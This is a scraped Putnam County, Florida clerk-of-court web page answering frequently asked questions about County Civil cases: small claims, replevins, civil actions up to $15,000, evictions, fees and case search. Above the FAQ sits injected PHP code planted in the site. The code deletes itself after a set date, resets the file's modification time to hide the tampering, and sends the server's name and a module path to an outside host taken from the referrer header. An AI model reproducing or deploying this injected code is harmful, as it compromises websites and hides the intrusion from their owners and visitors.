check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } County Civil FAQ's
Home County Civil FAQ's

More... Quick Links

County Civil Frequently Asked Questions
  Toggle all descriptions Collapse all descriptions
Frequently Asked Questions (Click to sort)
What is a County Civil case?

A County Civil case is any civil matter that falls within the jurisdiction of County Court. Detail
may be found in Chapter 34 of the Florida Statutes. County Civil cases include several different
types of matters:

  • Small Claims
    Disputes involving money damages where the amount at issue does not exceed
    excluding costs, interest and attorney fees. Click here for more information.
  • Replevins
    Disputes involving property that someone will not return. Click here for more information.
  • Civil Actions
    Civil Lawsuits not within Small Claims jurisdiction where the amount at issue does not
    exceed $15,000
    excluding costs, interest and attorney's fees.
    ***Note: Those civil lawsuits where the amount at issue exceeds $15,000 excluding
    costs, interest, and attorney's fees are within the jurisdiction of the Circuit Court.
  • Landlord / Tenant Evictions
    Click here for more information.

How do I file a Civil or Equity Action (up to $15,000)?

Civil Actions are filed in the County Civil Division, but the Clerk's Office cannot help you with any
paperwork. Please consult your Attorney.

***Please understand that Judges, Judicial Assistants, Clerks of Court,
and Sheriff's Department employees CANNOT practice law or give you
legal advice. They can ONLY point out the existence of certain procedures,
but CANNOT tell you how to follow them or how effective they will be. ONLY
A LAWYER CAN GIVE YOU LEGAL ADVICE. You should talk with a lawyer
if you have any questions about your rights.

What are the fees for the County Civil cases?

Click here.

How do I search for a Civil case?

Click on Online Inquiry System at the top of the Site Navigation bar on the left side of this page.

Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.